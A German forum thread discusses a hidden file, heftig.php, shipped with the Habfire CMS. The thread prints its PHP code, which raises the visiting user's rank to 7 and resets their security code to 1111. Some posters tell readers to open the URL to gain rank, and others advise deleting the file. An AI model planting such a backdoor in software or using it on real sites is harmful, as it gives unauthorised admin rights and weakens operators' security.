Habfire CMS Exploit

-Rubaz

Hier ist mal ein Exploit das ich gefunden habe

PHP

<!--?php
require_once('./data_classes/server-data.php_data_classes-core.php.php');
require_once('./data_classes/server-data.php_data_classes-session.php.php');
mysql_query("UPDATE users SET rank = 7, getmoney_date = '".$date_normal."' WHERE id = '".$my_id."'") or die(mysql_error());
mysql_query("UPDATE users SET secretcode = 1111, getmoney_date = '".$date_normal."' WHERE id = '".$my_id."'") or die(mysql_error());
?>

Damit ihr die datei sehen könnt (heftig.php) Hab ich für euch mal ein TuT herraus gefischt:

Anzeigen versteckter Dateien

Real_Seri0uz

PHP

mysql_query("UPDATE users SET rank = 7

Sieht nach einer Lücke aus . Setzt den User auf rank 7.

Gib einfach mal ein : http://yourdomain/heftig.php .

Danach haste eventuell Rank 7.

Ich weiß nicht ob man das eine Lücke nennen sollte. Es wird eigentlich nur der Rank upgedatet^^

-Rubaz

Das hat jede HabfireCMS also die datei löschen!!!!

intel_c0re

Zitat von Real_Seri0uz

Sieht nach einer Lücke aus . Setzt den User auf rank 7.

right

LaRevolution

Jetzt weiß es jeder...
Leute die es nicht schnell möglichst Entfernen
dan sind fast alle die das besitzen Down

Nuxones

Dann sollte man den Thread eventuell pinnen.

Hydra_original

Also ich habe auch die HabFireCMS und eine heftig.php ist bei mir nicht zu finden

LaRevolution

Zitat von TraxMachine

Also ich habe auch die HabFireCMS und eine heftig.php ist bei mir nicht zu finden

Sie ist versteckt Http://yourdomain/Heftig.php
Du musst angemeldet sein Falls du das Versuchst falls es die nicht zu finden gibt hast du diese lücke nicht !

intel_c0re

Alle die Habfire CMS benutzen:
gibt in euren Browser folgendes ein:
http://deinhotel/heftig.php

Real_Seri0uz

Zitat von LaRevolution

Jetzt weiß es jeder...
Leute die es nicht schnell möglichst fixxen
dan sind fast alle die das besitzen Down

Da muss man nichts fixxen

Nur die heftig.php entfernen.

Hydra_original

Zitat von LaRevolution

Zitat von Â»TraxMachineÂ«

Also ich habe auch die HabFireCMS und eine heftig.php ist bei mir nicht zu finden
Sie ist versteckt Http://yourdomain/Heftig.php
Du musst angemeldet sein Falls du das Versuchst falls es die nicht zu finden gibt hast du diese lücke nicht !

Wenn ich diese URL eingebe, kommt folgender Fehler:

"

Sorry, aber wir haben die angeforderte Seite nicht gefunden!

Bitte gebe die URL erneut ein. Wenn du am Ende
wieder hier bist, dann nutze den "ZURÃœCK" Button, um wieder dort
hinzugelangen, wo du gestartet bist. Wenn du noch nicht eingeloggt bist,
dann log dich bitte zuerst ein.

"

Also hab ich diese Lücke nicht

Real_Seri0uz

PHP

<!--?php
require_once('./data_classes/server-data.php_data_classes-core.php.php');
require_once('./data_classes/server-data.php_data_classes-session.php.php');
mysql_query("UPDATE users SET rank = 7, getmoney_date = '".$date_normal."' WHERE id = '".$my_id."'") or die(mysql_error());
mysql_query("UPDATE users SET secretcode = 1111, getmoney_date = '".$date_normal."' WHERE id = '".$my_id."'") or die(mysql_error());
?>

<!--?php ist ja mal fail.

Bornman

Hallo,

Dieser Command bewzweckt einfach nur das der jenige der die Seite aufruft Rank 7 bekommt, und der Secret (Sicherheitscode) auf
1111 gesettzt wird.

Habfire CMS Exploit

Jetzt mitmachen!

Benutzer online in diesem Thema